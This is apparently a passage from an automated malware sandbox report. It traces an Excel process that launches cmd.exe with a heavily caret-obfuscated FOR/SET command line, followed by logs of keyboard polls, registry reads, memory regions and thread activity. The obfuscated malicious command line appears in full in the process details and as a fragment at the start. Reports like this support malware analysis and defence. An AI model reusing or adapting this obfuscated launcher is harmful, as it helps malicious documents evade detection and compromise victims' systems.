^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^\|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^^?=^!^@^-^:^:^=^^!)&&( , , (^s^e^t ^#^;=^!^~^`^^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) , os_pid = 0xac0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
System	Get Cursor	x_out = 723, y_out = 490	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL	1	Fn
System	Get Time	type = Ticks, time = 312548	7	Fn
Module	Load	module_name = VBE7.DLL, base_address = 0x7fee5ce0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = 600, address_out = 0x7fee5de4ee0	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 0x7fee5ce0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = 600, address_out = 0x7fee5de4ee0	1	Fn
System	Get Cursor	x_out = 1072, y_out = 125	1	Fn

Process #3: cmd.exe

119

0

»

Information	Value
ID	#3
File Name	c:\windows\system32\cmd.exe
Command Line	CMD.Exe /c ^F^o^r ; /^f ;; " tokens= +2 delims=FeH" , %^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^\|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,%^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^\|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^^?=^!^@^-^:^:^=^^!)&&( , , (^s^e^t ^#^;=^!^~^`^^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:37, Reason: Child Process
Unmonitor	End Time: 00:02:06, Reason: Self Terminated
Monitor Duration	00:00:29

OS Process Information

»

Information	Value
PID	0xac0
Parent PID	0x8f8 (c:\program files\microsoft office\root\office16\excel.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x AC4

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x0000000000130000	0x00130000	0x0022ffff	Private Memory	rw	-
private_0x0000000000230000	0x00230000	0x0032ffff	Private Memory	rw	-
private_0x0000000000360000	0x00360000	0x0045ffff	Private Memory	rw	-
pagefile_0x0000000000460000	0x00460000	0x005e7fff	Pagefile Backed Memory	r	-
private_0x0000000000600000	0x00600000	0x0060ffff	Private Memory	rw	-
pagefile_0x0000000000610000	0x00610000	0x00790fff	Pagefile Backed Memory	r	-
pagefile_0x00000000007a0000	0x007a0000	0x01b9ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001ba0000	0x01ba0000	0x01ee2fff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01ef0000	0x021befff	Memory Mapped File	r	-
cmd.exe	0x4a0b0000	0x4a108fff	Memory Mapped File	rwx	-
user32.dll	0x77a20000	0x77b19fff	Memory Mapped File	rwx	-
kernel32.dll	0x77b20000	0x77c3efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
winbrand.dll	0x7fef59a0000	0x7fef59a7fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefdd60000	0x7fefddcafff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdf60000	0x7fefdfc6fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefed60000	0x7fefed8dfff	Memory Mapped File	rwx	-
msctf.dll	0x7feff1e0000	0x7feff2e8fff	Memory Mapped File	rwx	-
usp10.dll	0x7feff4d0000	0x7feff598fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff5a0000	0x7feff63efff	Memory Mapped File	rwx	-
lpk.dll	0x7feff860000	0x7feff86dfff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffda000	0x7fffffda000	0x7fffffdafff	Private Memory	rw	-
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	rw	-

Threads

Thread 0xac4

119

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2018-11-06 10:24:11 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 136781	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a0b0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
